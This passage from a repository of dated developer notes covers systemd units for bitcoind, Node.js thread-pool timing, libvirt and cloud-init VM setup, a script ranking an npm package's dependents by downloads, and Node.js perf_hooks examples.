timerStop = () => { 6 | console.timeEnd(labelTime) 7 | timerStop = () => {} 8 | } 9 | 10 | function makeCall () { 11 | count -= 1 12 | if (count >= 0) fn(makeCall) 13 | else timerStop() 14 | } 15 | 16 | timerStart() 17 | for (let i = 0; i < parallel; ++i) makeCall() 18 | } 19 | -------------------------------------------------------------------------------- /2019-08-23-systemd-instead-pm2/README.md: -------------------------------------------------------------------------------- 1 | # systemd instead pm2? 2 | 3 | Few years ago when I need run my apps on servers I found [pm2](http://pm2.keymetrics.io/). This is really cool tool, everything what you need is just install [Node.js](https://nodejs.org/) and then pm2 with [npm](https://www.npmjs.com/). It's handy start / stop / restart programs, logs from stdout/stderr going to files and pm2 have modules for log-rotation. You also can define [Ecosystem File](http://pm2.keymetrics.io/docs/usage/application-declaration/) where describe environment variables and other things. In past for deployment new version I logged through SSH to server, fetched new code to local repo with SSH agent forwarding (I'm sorry about that, never repeat my mistake, agent forwardning is not safe!) and restarted service. All fine, while you project is not big. 4 | 5 | Now in containers era we run our services in containers which managed by different systems, from simple [docker-compose](https://docs.docker.com/compose/compose-file/) to omnipotent [Kubernetes](https://kubernetes.io/). Logs forwarded by programs like [Fluent Bit](https://fluentbit.io/) to [Elastic Stack](https://www.elastic.co/products/elastic-stack). Do we really pm2 now? I'm think not. 6 | 7 | But what if you need run some services which are not good for containers? Maybe services have big performance degradation or you do not want to deal with state in containers? Do we still need pm2 for this? I still think not, because much better use [systemd](https://www.freedesktop.org/wiki/Software/systemd/) for this. 8 | 9 | `systemd` is not simple, there a lot of docs, some helpful pages: 10 | 11 | - list of all `systemd` manpages — https://www.freedesktop.org/software/systemd/man/ 12 | - `journal`: 13 | - `journalctl`: https://www.freedesktop.org/software/systemd/man/journalctl.html 14 | - `journald.conf`: https://www.freedesktop.org/software/systemd/man/journald.conf.html 15 | - `systemd-journald.service`: https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html 16 | - `systemctl`: https://www.freedesktop.org/software/systemd/man/systemctl.html 17 | - `systemd`: https://www.freedesktop.org/software/systemd/man/systemd.html 18 | - `systemd.exec`: https://www.freedesktop.org/software/systemd/man/systemd.exec.html 19 | - `systemd.kill`: https://www.freedesktop.org/software/systemd/man/systemd.kill.html 20 | - `systemd.resource-usage`: https://www.freedesktop.org/software/systemd/man/systemd.resource-control.html 21 | - `systemd.unit`: https://www.freedesktop.org/software/systemd/man/systemd.unit.html 22 | - `systemd.service`: https://www.freedesktop.org/software/systemd/man/systemd.service.html 23 | 24 | Example of [Bitcoin Core](https://github.com/bitcoin/bitcoin/) service (see [bitcoind.service](https://github.com/bitcoin/bitcoin/blob/master/contrib/init/bitcoind.service)): 25 | 26 | `systemd` loading units from few directories, but if we create unit we should put it to `/etc/systemd/system/` ([systemd.unit](https://www.freedesktop.org/software/systemd/man/systemd.unit.html) see `Table 1`). 27 | 28 | ```bash 29 | cat > /etc/systemd/system/bitcoind.service <= 242 37 | ; ConditionMemory=>=512M 38 | ; ConditionCPUs=>=1 39 | 40 | [Service] 41 | Type=simple 42 | ExecStart=/usr/local/bin/bitcoind \ 43 | -datadir=/var/lib/bitcoind \ 44 | -txindex \ 45 | -disablewallet \ 46 | -printtoconsole \ 47 | -server \ 48 | -rpcuser=bitcoinrpc \ 49 | -rpcpassword=password \ 50 | -rpcport=8332 \ 51 | -zmqpubhashtx=tcp://127.0.0.1:28332 \ 52 | -rest 53 | User=ubuntu 54 | Group=ubuntu 55 | KillMode=process 56 | KillSignal=SIGTERM 57 | TimeoutStopSec=30s 58 | Restart=on-failure 59 | # /var/lib/bitcoind 60 | StateDirectory=bitcoind 61 | StateDirectoryMode=0710 62 | 63 | [Install] 64 | WantedBy=multi-user.target 65 | EOF 66 | ``` 67 | 68 | Optionally we can control resource usage with [systemd.resource-control](https://www.freedesktop.org/software/systemd/man/systemd.resource-control.html), by adding options to `[Service]`: 69 | 70 | ```bash 71 | [Service] 72 | CPUAccounting=1 73 | CPUQuota=100% 74 | MemoryAccounting=1 75 | MemoryMax=300M 76 | MemorySwapMax=0 77 | LimitRSS=300M 78 | LimitAS=500M 79 | ``` 80 | 81 | Before we will able use our service we need reload configuration: 82 | 83 | ```bash 84 | systemctl daemon-reload 85 | systemctl enable bitcoind.service --now 86 | ``` 87 | 88 | Logs can be read with `journalctl`: 89 | 90 | ```bash 91 | journalctl -feu bitcoind 92 | ``` 93 | -------------------------------------------------------------------------------- /2019-08-30-node-uvthreads-sync-async/README.md: -------------------------------------------------------------------------------- 1 | # uvthreads sync vs async in Node.js 2 | 3 | Yesterday, while I watched `A Journey into Node.js Internals` by `Tamar Twena-Stern` I realized how her example of profiling Node.js is good for demonstrating thread pool in [Node.js](https://nodejs.org/). 4 | 5 | Record of talk on YouTube (from 18:52): https://youtu.be/LbwUETu7Rgc?t=1132 6 | 7 | While speaker talking about profiling and blocking event loop, I want take attention on parallelization. Code: 8 | 9 | ```js 10 | const crypto = require('crypto') 11 | 12 | ;(async () => { 13 | const count = 1e2 14 | const async = () => new Promise((resolve) => crypto.pbkdf2('secret', 'salt', 1e5, 64, 'sha256', () => resolve())) 15 | const sync = () => crypto.pbkdf2Sync('secret', 'salt', 1e5, 64, 'sha256') 16 | 17 | console.time('async') 18 | await Promise.all(new Array(count).fill(null).map(() => async())) 19 | console.timeEnd('async') 20 | 21 | console.time('sync') 22 | for (let i = 0; i < count; ++i) sync() 23 | console.timeEnd('sync') 24 | })() 25 | ``` 26 | 27 | Maybe this will be surprised for somebody, but result (CPU `i5-8250U`): 28 | 29 | ```bash 30 | $ node test.js 31 | async: 2680.411ms 32 | sync: 10029.770ms 33 | ``` 34 | 35 | Why async 4x times faster? Because async version of `pbkdf2` works in libuv threads. By default we have 4 threads. My CPU have 4 cores (8 vCPU), so each thread work on own CPU and we receive acceleration. 36 | 37 | With changed thread pool size: 38 | 39 | ```bash 40 | $ UV_THREADPOOL_SIZE=2 node test.js 41 | async: 4998.330ms 42 | sync: 9904.204ms 43 | $ UV_THREADPOOL_SIZE=6 node test.js 44 | async: 2622.291ms 45 | sync: 9898.255ms 46 | ``` 47 | 48 | Interesting, that increasing number of threads to 6 not improved result compare to 4 threads. I guess that this because crypto accelerator available per CPU, i.e. one per two vCPUs. 49 | -------------------------------------------------------------------------------- /2019-08-31-libvirt-usage/README.md: -------------------------------------------------------------------------------- 1 | # Virtual Machines with libvirt 2 | 3 | In containers era it's can be strange to use Virtual Machines for running or testing something, but sometimes we need fully isolated environment because in such way we can reproduce some parts of production systems locally. Also, some software much easier test and debug in Virtual Machines. 4 | 5 | - [libvirt](#libvirt) 6 | - [setup](#setup) 7 | - [Tools](#tools) 8 | - [URI](#uri) 9 | - [Image](#image) 10 | - [ISO image for cloud-init](#iso-image-for-cloud-init) 11 | - [Creating VM](#creating-vm) 12 | - [Static IP](#static-ip) 13 | - [Destroy](#destroy) 14 | 15 | ### libvirt 16 | 17 | [libvirt](https://libvirt.org/) is great because provide universal API which can work with different technologies. Usually KVM/QEMU is used. 18 | 19 | `libvirtd` can be managed in diffent ways (see https://libvirt.org/apps.html). You can do a lot with GUI app [virt-manager](https://virt-manager.org/), and this probably is good choice if you need 1-2 machines without recreating them. In other case we need automate creation/updating/removing/etc of our VMs. 20 | 21 | Nowadays a lot of Linux distros provide cloud images (for example [fedora](https://alt.fedoraproject.org/cloud/), [ubuntu](https://cloud-images.ubuntu.com/)). It's preferred way because you receive working OS out of box with installed [cloud-init](https://cloud-init.io/) services (for initial setup, like adding SSH-keys). 22 | 23 | ### Setup 24 | 25 | ##### Tools 26 | 27 | Before we continue you should install `libvirt` itself, `virt-install` and `genisoimage` tools. Tools like `virsh` and `qemu-*` will be installed with `libvirt`. Problem with `virsh` (and why we need `virt-install`) that `virsh` works only with xml documents. It's not very comfortable works with xml for creating Virtual Machines, so we will use `virt-install`. You also need add yourself to `libvirt` group: 28 | 29 | ```bash 30 | usermod -a -G libvirt $(whoami) 31 | ``` 32 | 33 | ##### URI 34 | 35 | Since `libvirt` support different kinds of virtualization we need to say which exactly one we want to use. `virsh` uses environment variable `LIBVIRT_DEFAULT_URI`, if this variable is not defined `qemu:///session` will be used for non-root users and `qemu:///system` for root user, so for using system mode we should define `LIBVIRT_DEFAULT_URI` (otherwise VM will have local user permissions). See [libvirt uri](https://libvirt.org/uri.html), [what is the difference between](https://wiki.libvirt.org/page/FAQ#What_is_the_difference_between_qemu:.2F.2F.2Fsystem_and_qemu:.2F.2F.2Fsession.3F_Which_one_should_I_use.3F), [explanation on KVM/QEMU page](https://libvirt.org/drvqemu.html#securitydac). 36 | 37 | ```bash 38 | echo "export LIBVIRT_DEFAULT_URI=qemu:///system" >> ~/.bashrc 39 | LIBVIRT_DEFAULT_URI=qemu:///system 40 | ``` 41 | 42 | ##### Image 43 | 44 | We will create Ubuntu 18.04 in our VM, let's download base image: 45 | 46 | ```bash 47 | mkdir /var/lib/libvirt/images/base 48 | curl -o /var/lib/libvirt/images/base/ubuntu18.04.qcow2 https://cloud-images.ubuntu.com/bionic/current/bionic-server-cloudimg-amd64.img 49 | ``` 50 | 51 | I created `base` directory in `/var/lib/libvirt/images`, but this is not necessary, you can use directory which available for you (`/var/lib/libvirt` require root access). 52 | 53 | Now we will create image for our VM and resize it to 5G: 54 | 55 | ```bash 56 | qemu-img create -f qcow2 -b /var/lib/libvirt/images/base/ubuntu18.04.qcow2 /var/lib/libvirt/images/test1.qcow2 57 | qemu-img resize /var/lib/libvirt/images/test1.qcow2 5G 58 | qemu-img info /var/lib/libvirt/images/test1.qcow2 59 | ``` 60 | 61 | ```bash 62 | image: /var/lib/libvirt/images/test1.qcow2 63 | file format: qcow2 64 | virtual size: 5.0G (5368709120 bytes) 65 | disk size: 200K 66 | cluster_size: 65536 67 | backing file: /var/lib/libvirt/images/base/ubuntu18.04.qcow2 68 | Format specific information: 69 | compat: 1.1 70 | lazy refcounts: false 71 | refcount bits: 16 72 | corrupt: false 73 | ``` 74 | 75 | When we create image with backing file we should not move/remove backing file in future, [qcow2](https://en.wikipedia.org/wiki/Qcow) works as copy-on-write layered file system. If you check size of created image you will find that file size less than 1MB. 76 | 77 | We also can `convert` base image, so backing file will not be required: 78 | 79 | ```bash 80 | qemu-img convert -f qcow2 -O qcow2 -c bionic-server-cloudimg-amd64.img ubuntu18.04.qcow2 81 | ``` 82 | 83 | If we will not use flag `-c` we will receive not compressed image: 1.1GB vs \~330MB. 84 | 85 | We also can mount our image with `qemu-nbd` tool: 86 | 87 | ```bash 88 | qemu-nbd -c /dev/nbd0 /var/lib/libvirt/images/test1.qcow2 89 | ``` 90 | 91 | and then mount device `/dev/nbd0p1` as usual with `mount` command. 92 | 93 | ##### ISO image for cloud-init 94 | 95 | For initial setup in our VM we can use [cloud-init](https://cloud-init.io/) which already preinstalled. We will need two files: 96 | 97 | 1) Empty `meta-data`. For available options see: https://cloudinit.readthedocs.io/en/latest/topics/datasources.html 98 | 99 | 2) `user-data` with defined `hostname`, list of SSH-keys and new `sshd` config: 100 | 101 | ```bash 102 | #cloud-config 103 | hostname: test1 104 | 105 | disable_root: false 106 | ssh_authorized_keys: 107 | - ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDrN2DVTlDzXklIDAkvet62Ve5uQPNpCCc0EG9JjGBzpWGy80r1KLgJgas5xLJYGZaygfuxY6Iij3mZ3QHVbCa3XITjojR8v53jUGXQ0Ouo/D3VaBdRqeno7iJu6GsWKfVo15duf49f4AB98pj7BqXcHxj8xyxLSb2keUwvi7ugJb3KDpEjdWprajN92Uj/uT4PpDM5xrSRb1QVwXJ0XWz8TKZKlhH0xD3UWjLEhQjOk6PO31Dcip+k9waxyJGlmLy/c7Z8KA5gOzGbpN3q1phV4OPzKj6RlkJj0YY1Lvqt8aV4QqLfKFatBGL0+5GyEkckWUsJkXbmcaVbMvXU0Oqb fanatid@ya.ru 108 | 109 | write_files: 110 | - path: /etc/ssh/sshd_config 111 | owner: root:root 112 | permissions: '0600' 113 | content: | 114 | AcceptEnv LANG LC_* 115 | ChallengeResponseAuthentication no 116 | PasswordAuthentication no 117 | PrintMotd no 118 | Subsystem sftp /usr/lib/openssh/sftp-server 119 | UsePAM yes 120 | X11Forwarding yes 121 | 122 | runcmd: 123 | - systemctl restart sshd.service 124 | ``` 125 | 126 | Main documentation page: https://cloudinit.readthedocs.io/en/latest/index.html Personally I found [examples](https://cloudinit.readthedocs.io/en/latest/topics/examples.html) and [modules](https://cloudinit.readthedocs.io/en/latest/topics/modules.html) most useful. 127 | 128 | Creating image: 129 | 130 | ```bash 131 | genisoimage -output /var/lib/libvirt/images/test1-cidata.iso -input-charset utf8 -volid cidata -joliet -rock user-data meta-data 132 | ``` 133 | 134 | ##### Creating VM 135 | 136 | As I previously wrote we will use `virt-install` for creating VM: 137 | 138 | ```bash 139 | $ virt-install \ 140 | --name test1 \ 141 | --virt-type kvm \ 142 | --os-type linux \ 143 | --os-variant ubuntu18.04 \ 144 | --memory 1024 \ 145 | --vcpus=1 \ 146 | --disk /var/lib/libvirt/images/test1.qcow2,format=qcow2 \ 147 | --disk /var/lib/libvirt/images/test1-cidata.iso,device=cdrom \ 148 | --network network=default \ 149 | --graphics none \ 150 | --import \ 151 | --noautoconsole 152 | 153 | Starting install... 154 | Domain creation completed. 155 | ``` 156 | 157 | I do not think that arguments need comments, they are pretty obvious. After this command we need get Virtual Machine IP address (because libvirt uses [dnsmasq](http://www.thekelleys.org.uk/dnsmasq/doc.html) for DHCP, see [libvirtd and dnsmasq (wiki page)](https://wiki.libvirt.org/page/Libvirtd_and_dnsmasq)). 158 | 159 | ```bash 160 | $ virsh list 161 | Id Name State 162 | ----------------------- 163 | 19 test1 running 164 | $ virsh domifaddr test1 165 | Name MAC address Protocol Address 166 | ------------------------------------------------------------------------------- 167 | vnet0 52:54:00:3d:78:cf ipv4 192.168.122.111/24 168 | ``` 169 | 170 | Our IP is `192.168.222.111` and we can connect with SSH: 171 | 172 | ```bash 173 | ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" root@192.168.122.111 174 | ``` 175 | 176 | Also, now we can eject our image with `cloud-init` data: 177 | 178 | ```bash 179 | virsh change-media --domain test1 sda --eject 180 | ``` 181 | 182 | ##### Static IP 183 | 184 | If we trying reproduce some system dynamic IP address are not helpful, because configs oftenly have hard coded IP of services, so we need use static IP addresses for our VMs. 185 | 186 | Unfortunatelly there is no very easy ways to do it, but this possible: 187 | 188 | ```bash 189 | virt-install \ 190 | --name test1 \ 191 | --virt-type kvm \ 192 | --os-type linux \ 193 | --os-variant ubuntu18.04 \ 194 | --memory 1024 \ 195 | --vcpus=1 \ 196 | --disk /var/lib/libvirt/images/test1.qcow2,format=qcow2 \ 197 | --disk /var/lib/libvirt/images/test1-cidata.iso,device=cdrom \ 198 | --network network=default \ 199 | --graphics none \ 200 | --import \ 201 | --noautoconsole \ 202 | --print-xml | virsh define /dev/stdin 203 | 204 | virsh net-update default add ip-dhcp-host "" --live --config 205 | virsh net-update default delete ip-dhcp-host "" --live --config 206 | ``` 207 | 208 | Instead creating VM with `virt-install` we only define it with `virtsh` without starting, next we set IP `192.168.122.10` for our VM by MAC address. As result you should see: 209 | 210 | ```bash 211 | Updated network default persistent config and live state 212 | ``` 213 | 214 | Other `virsh net-update` commands: https://wiki.libvirt.org/page/Networking#virsh_net-update 215 | 216 | ##### Destroy 217 | 218 | For removing our VM we need: 219 | 220 | 1) Stop it with `destroy` command: `virsh destroy test1` 221 | 2) Undefine (remove info about it from `libvirtd`): `virsh undefine test1` 222 | -------------------------------------------------------------------------------- /2019-09-01-npm-package-dependents/README.md: -------------------------------------------------------------------------------- 1 | # Package dependents from npmjs.com 2 | 3 | Every time when I visited any package page on [npm](https://www.npmjs.com/) I was interested which dependents add more weight in downloads. Finally I decide write simple script which will show it. 4 | 5 | Script have zero dependencies and also good demonstration of Node.js [Streams](https://nodejs.org/api/stream.html) and progress bar implemented on [TTY](https://nodejs.org/api/tty.html) (simple version of [node-progress](https://github.com/visionmedia/node-progress)). 6 | 7 | I did not found API for fetching dependents, so I checked how npmjs.com works and fetching data from API for web-site. Luckly I found that npm provide API for download statistic and even more, request can be batched up to 128 items. Unfortunately batches still not supported for scoped packages. 8 | 9 | Script located in current directory under name [show-dependents.js](./show-dependents.js). Everything what you need to do is just execute it with package name as first argument. For example for package [hash-base](https://www.npmjs.com/package/hash-base): 10 | 11 | ```bash 12 | ./show-dependents.js hash-base 13 | Processed 25 / 31 (80.65%), elapsed: 2.74s 14 | ┌─────────┬───────────────────────────────────┬──────────────┐ 15 | │ (index) │ package │ downloads │ 16 | ├─────────┼───────────────────────────────────┼──────────────┤ 17 | │ 0 │ 'ripemd160' │ '25,705,386' │ 18 | │ 1 │ 'md5.js' │ '25,215,484' │ 19 | │ 2 │ 'react-misc-toolbox' │ '156' │ 20 | │ 3 │ 'responsive-react-app' │ '130' │ 21 | │ 4 │ 'webche' │ '115' │ 22 | │ 5 │ 'iris-embedded-sdk' │ '96' │ 23 | │ 6 │ 'react-input-select' │ '57' │ 24 | │ 7 │ 'viber-botkit' │ '25' │ 25 | │ 8 │ 'carousel-react' │ '22' │ 26 | │ 9 │ 'search-list-react' │ '18' │ 27 | │ 10 │ 'search-input-react' │ '18' │ 28 | │ 11 │ 'canvas-fingerprint' │ '17' │ 29 | │ 12 │ 'a_react_reflux_demo' │ '15' │ 30 | │ 13 │ '@ngxvoice/ngx-voicelistner' │ '13' │ 31 | │ 14 │ '@southcn/ckeditor5-build-inline' │ '12' │ 32 | │ 15 │ 'digital-keyboard-demos' │ '12' │ 33 | │ 16 │ 'fhir2' │ '10' │ 34 | │ 17 │ 'iris-node-js-sdk' │ '10' │ 35 | │ 18 │ 'react-redux-demo1' │ '10' │ 36 | │ 19 │ 'miguelcostero-ng2-toasty' │ '10' │ 37 | │ 20 │ 'freemamba' │ '8' │ 38 | │ 21 │ 'outils-ren' │ '8' │ 39 | │ 22 │ '@ericmcornelius/ease' │ '6' │ 40 | │ 23 │ 'lrbceshi' │ '6' │ 41 | │ 24 │ 'vue-compment' │ '5' │ 42 | └─────────┴───────────────────────────────────┴────────────── 43 | ``` 44 | 45 | As you can probably noted, indexed number of packages is different from total number... I'm not sure why npmjs.com show total number bigger than number of dependents, probably because private packages exists? 46 | -------------------------------------------------------------------------------- /2019-09-01-npm-package-dependents/show-dependents.js: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env node 2 | const https = require('https') 3 | const { EOL } = require('os') 4 | const stream = require('stream') 5 | 6 | async function makeRequest (url, headers = {}) { 7 | return new Promise((resolve, reject) => { 8 | const req = https.request(url, { headers }) 9 | req.on('error', reject) 10 | req.on('timeout', () => { 11 | req.abort() 12 | reject(new Error('Timeout error')) 13 | }) 14 | req.on('response', (resp) => { 15 | if (resp.statusCode !== 200) { 16 | return reject(new Error(resp.statusMessage)) 17 | } 18 | 19 | const chunks = [] 20 | resp.on('data', (chunk) => chunks.push(chunk)) 21 | resp.on('end', () => resolve(Buffer.concat(chunks).toString('utf8'))) 22 | }) 23 | 24 | req.end() 25 | }) 26 | } 27 | 28 | async function makeRequestJSON (...args) { 29 | return JSON.parse(await makeRequest(...args)) 30 | } 31 | 32 | async function getTotal (pkg) { 33 | const html = await makeRequest(`https://www.npmjs.com/package/${pkg}`) 34 | const match = html.match(/href="\?activeTab=dependents">.*?>([0-9,]+)/) || ['', ''] 35 | 36 | const value = parseInt(match[1].replace(/,/, ''), 10) 37 | if (Number.isInteger(value)) return value 38 | 39 | throw new Error(`Invalid number of dependents: ${match}`) 40 | } 41 | 42 | function delay (ms) { 43 | return new Promise((resolve) => setTimeout(resolve, ms)) 44 | } 45 | 46 | class FetchDepsStream extends stream.Readable { 47 | constructor (pkg, total) { 48 | super({ objectMode: true }) 49 | 50 | this.pkg = pkg 51 | this.offset = 0 52 | this.step = 36 53 | this.total = total 54 | 55 | this.lastFetch = 0 56 | this.delayBetweenRequests = 1000 57 | } 58 | 59 | async _read () { 60 | if (this.offset >= this.total) { 61 | this.push(null) 62 | return 63 | } 64 | 65 | const sleep = this.lastFetch + this.delayBetweenRequests - Date.now() 66 | if (sleep > 0) await delay(sleep) 67 | 68 | const XHRHeaders = { 'x-requested-with': 'XMLHttpRequest', 'x-spiferack': 1 } 69 | const { packages } = await makeRequestJSON(`https://www.npmjs.com/browse/depended/${this.pkg}?offset=${this.offset}`, XHRHeaders) 70 | for (const pkg of packages) this.push(pkg.name) 71 | 72 | this.lastFetch = Date.now() 73 | this.offset += this.step 74 | 75 | if (packages.length < 36) this.push(null) 76 | } 77 | } 78 | 79 | class FetchStatsTransform extends stream.Transform { 80 | constructor (pkg, bar) { 81 | super({ objectMode: true }) 82 | 83 | this.pkg = pkg 84 | this.bar = bar 85 | 86 | this.queue = [] 87 | this.pkgsPerRequest = 128 88 | 89 | this.stats = [] 90 | 91 | this.lastFetch = 0 92 | this.delayBetweenRequests = 250 93 | } 94 | 95 | async fetch (pkg) { 96 | const sleep = this.lastFetch + this.delayBetweenRequests - Date.now() 97 | if (sleep > 0) await delay(sleep) 98 | 99 | const pkgs = pkg ? [pkg] : this.queue.splice(0, this.pkgsPerRequest) 100 | 101 | // https://github.com/npm/registry/blob/master/docs/download-counts.md 102 | let stats = await makeRequestJSON(`https://api.npmjs.org/downloads/point/last-month/${pkgs.join(',')}`) 103 | if (pkg) stats = { [stats.package]: { downloads: stats.downloads } } 104 | 105 | for (const [pkg, { downloads }] of Object.entries(stats)) this.stats.push({ package: pkg, downloads }) 106 | this.bar.tick(pkgs.length) 107 | 108 | this.lastFetch = Date.now() 109 | } 110 | 111 | async _flush (callback) { 112 | while (this.queue.length > 0) await this.fetch() 113 | 114 | this.stats.sort((a, b) => b.downloads - a.downloads) 115 | 116 | const nfmt = new Intl.NumberFormat('en') 117 | for (const item of this.stats) item.downloads = nfmt.format(item.downloads) 118 | 119 | callback(null, this.stats) 120 | } 121 | 122 | async _transform (pkg, encoding, callback) { 123 | const isScoped = pkg.startsWith('@') 124 | if (isScoped) { 125 | await this.fetch(pkg) 126 | } else { 127 | this.queue.push(pkg) 128 | if (this.queue.length >= this.pkgsPerRequest) await this.fetch() 129 | } 130 | 131 | callback(null) 132 | } 133 | } 134 | 135 | async function fetch (pkg, total, bar) { 136 | return new Promise((resolve, reject) => { 137 | const deps = new FetchDepsStream(pkg, total) 138 | const stats = new FetchStatsTransform(pkg, bar) 139 | 140 | stats.on('error', reject) 141 | stats.on('data', resolve) 142 | stats.on('end', () => reject(new Error('stream end without data, it\'s wrong'))) 143 | 144 | deps.pipe(stats) 145 | }) 146 | } 147 | 148 | function createProgressBar (total) { 149 | const stream = process.stdout 150 | if (!stream.isTTY) { 151 | return { 152 | tick () {}, 153 | stop () {} 154 | } 155 | } 156 | 157 | let curr = 0 158 | 159 | const ts = process.hrtime() 160 | function draw () { 161 | const diffTS = process.hrtime(ts) 162 | stream.cursorTo(0) 163 | stream.write(`Processed ${curr} / ${total} (${(curr * 100 / total).toFixed(2)}%), elapsed: ${(diffTS[0] + diffTS[1] / 1e9).toFixed(2)}s`) 164 | stream.clearLine(1) 165 | } 166 | const drawId = setInterval(draw, ~~(1000 / 62)).unref() // 62 fps 167 | 168 | return { 169 | tick (len) { 170 | curr = Math.min(curr + len, total) 171 | draw() 172 | }, 173 | 174 | stop () { 175 | clearInterval(drawId) 176 | stream.write(EOL) 177 | } 178 | } 179 | } 180 | 181 | ;(async () => { 182 | const pkg = process.argv[2] 183 | const total = await getTotal(pkg) 184 | 185 | const bar = createProgressBar(total) 186 | const data = await fetch(pkg, total, bar) 187 | bar.stop() 188 | 189 | console.table(data, ['package', 'downloads']) 190 | })().catch((err) => { 191 | console.error(err.stack || err) 192 | process.exit(1) 193 | }) 194 | -------------------------------------------------------------------------------- /2019-09-12-node-perf-hooks/README.md: -------------------------------------------------------------------------------- 1 | # perf_hooks in Node.js 2 | 3 | While `Performance Timing API` — [perf_hooks](https://nodejs.org/api/perf_hooks.html) (docs for [v12.10.0](https://nodejs.org/docs/v12.10.0/api/perf_hooks.html)) was added to Node.js almost two years ago ([github.com/nodejs/node/pull/14680](https://github.com/nodejs/node/pull/14680)) but I even did not checked what this module provide. When I looked through docs I did not found detailed examples and wanted dive more to Garbage Collector, so this note is set of examples for each `entryType` in `perf_hooks`. 4 | 5 | Module is still `Experimental` (see [Stability Index](https://nodejs.org/api/documentation.html#documentation_stability_index)), so everything will be valid for [v12.10.0](https://github.com/nodejs/node/tree/v12.10.0), links will point on code for this version. 6 | 7 | - [node](#node) 8 | - [mark & measure](#mark--measure) 9 | - [function](#function) 10 | - [http](#http) 11 | - [http2](#http2) 12 | - [gc](#gc) 13 | 14 | #### node 15 | 16 | `PerformanceEntry` with type `node` is special entry, you can not receive it through observer, because it's already defined and available as property through `getter`. This entry is singleton class. 17 | 18 | From this entry we can receive duration in milliseconds which was required for finishing action (i.e. `milestone`). Currently we have access to 6 milestones. They perfectly described in [docs](https://nodejs.org/docs/v12.10.0/api/perf_hooks.html#perf_hooks_class_performancenodetiming_extends_performanceentry) ([code](https://github.com/nodejs/node/blob/v12.10.0/lib/perf_hooks.js#L154)). 19 | 20 | ```js 21 | { 22 | name: 'node', 23 | entryType: 'node', 24 | startTime: 0, 25 | duration: 53.86693799495697, 26 | nodeStart: 0.279431015253067, 27 | v8Start: 2.476245015859604, 28 | bootstrapComplete: 43.5908420085907, 29 | environment: 11.12601301074028, 30 | loopStart: 49.44547098875046, 31 | loopExit: 49.459022015333176, 32 | thirdPartyMainStart: undefined, 33 | thirdPartyMainEnd: undefined, 34 | clusterSetupStart: undefined, 35 | clusterSetupEnd: undefined, 36 | moduleLoadStart: undefined, 37 | moduleLoadEnd: undefined, 38 | preloadModuleLoadStart: undefined, 39 | preloadModuleLoadEnd: undefined 40 | } 41 | ``` 42 | 43 | Full code available in [examples/node.js](./examples/node.js) 44 | 45 | In version 12.10.0 we can see other fields, but milestones for this keys were removed [github.com/nodejs/node/pull/21247](https://github.com/nodejs/node/pull/21247), but keys still in inspect function. I created PR for removing it, so probably this will fixed soon ([github.com/nodejs/node/pull/29528](https://github.com/nodejs/node/pull/29528)). 46 | 47 | #### mark & measure 48 | 49 | `mark` and `measure` one of the simplest entry types in `perf_hooks`. Idea is simple, we create mark on timeline for some name, create another mark and then measure difference between. For example, we create mark `A`, then run some function, create mark `B` then measure time between two marks, we can see such both `mark` & `measure` in [PerformanceObserver 50 | ](https://nodejs.org/docs/v12.10.0/api/perf_hooks.html#perf_hooks_class_performanceobserver) callback: 51 | 52 | ```js 53 | {"name":"A","entryType":"mark","startTime":45.925918,"duration":0} 54 | {"name":"B","entryType":"mark","startTime":116.494052,"duration":0} 55 | {"name":"A to B","entryType":"measure","startTime":45.925918,"duration":70.568134} 56 | ``` 57 | 58 | Full code available in [examples/mark-measure.js](./examples/mark-measure.js) 59 | 60 | #### function 61 | 62 | Instead using `mark` & `measure` for synchronous functions we can use `timerify` which produce `function` entry type. But this valid only for synchronous functions, for async we still need use `mark`/`measure`. 63 | 64 | `timerify` cache resulted function as property in original function, so each time we will result same object: [perf_hooks.js#L415-L423](https://github.com/nodejs/node/blob/v12.10.0/lib/perf_hooks.js#L415-L423). 65 | 66 | Under the hood before and after original function call code get current time, so this should be faster than `mark` & `measure`: [node_perf.cc#L322-L338](https://github.com/nodejs/node/blob/v12.10.0/src/node_perf.cc#L322-L338). 67 | 68 | ```js 69 | {"name":"doSomeWork","entryType":"function","startTime":34.94268,"duration":65.832449} 70 | ``` 71 | 72 | Full code available in [examples/function.js](./examples/function.js) 73 | 74 | #### http 75 | 76 | HTTP Server in Node.js use `perf_hooks` for emitting duration of handling HTTP request. Duration will be time between creating ServerResponse and `ServerResponse#_finish` call. In source: [lib/\_http_server.js#L161-L175](https://github.com/nodejs/node/blob/v12.10.0/lib/_http_server.js#L161-L175) & [lib/internal/http.js#L31-L45](https://github.com/nodejs/node/blob/v12.10.0/lib/internal/http.js#L31-L45). Because `perf_hooks` works only when observers for `http` added, without it this should give zero overhead for HTTP Server with code for `perf_hooks`. 77 | 78 | ```js 79 | {"name":"HttpRequest","entryType":"http","duration":0.740417,"startTime":215104781.282011} 80 | ``` 81 | 82 | Full code available in [examples/http.js](./examples/http.js) 83 | 84 | #### http2 85 | 86 | HTTP2 is more complex than HTTP. In [http2](https://nodejs.org/docs/v12.10.0/api/http2.html) we have [Http2Session](https://nodejs.org/docs/v12.10.0/api/http2.html#http2_class_http2session) and [Http2Stream](https://nodejs.org/docs/v12.10.0/api/http2.html#http2_class_http2stream), one Session can have many Streams. Observer which subscribed to `http2` will have entry for each Session and Stream. While `http` type available only for ServerResponse now, `http2` type available for both client and server. 87 | 88 | Node.js docs also have good description fields of such entries: https://nodejs.org/docs/v12.10.0/api/http2.html#http2_collecting_http_2_performance_metrics 89 | 90 | ```js 91 | {"name":"Http2Stream","entryType":"http2","startTime":56.851517,"duration":3.810295,"id":1,"timeToFirstByte":0,"timeToFirstHeader":226649758.667291,"timeToFirstByteSent":226649761.046063,"bytesWritten":2,"bytesRead":0} 92 | {"name":"Http2Stream","entryType":"http2","startTime":56.303171,"duration":4.960001,"id":1,"timeToFirstByte":0,"timeToFirstHeader":226649762.293621,"timeToFirstByteSent":0,"bytesWritten":0,"bytesRead":2} 93 | {"name":"Http2Session","entryType":"http2","startTime":55.990767,"duration":5.992484,"type":"client","pingRTT":0,"framesReceived":5,"framesSent":5,"streamCount":1,"streamAverageDuration":4.960001,"bytesWritten":100,"bytesRead":72,"maxConcurrentStreams":1} 94 | 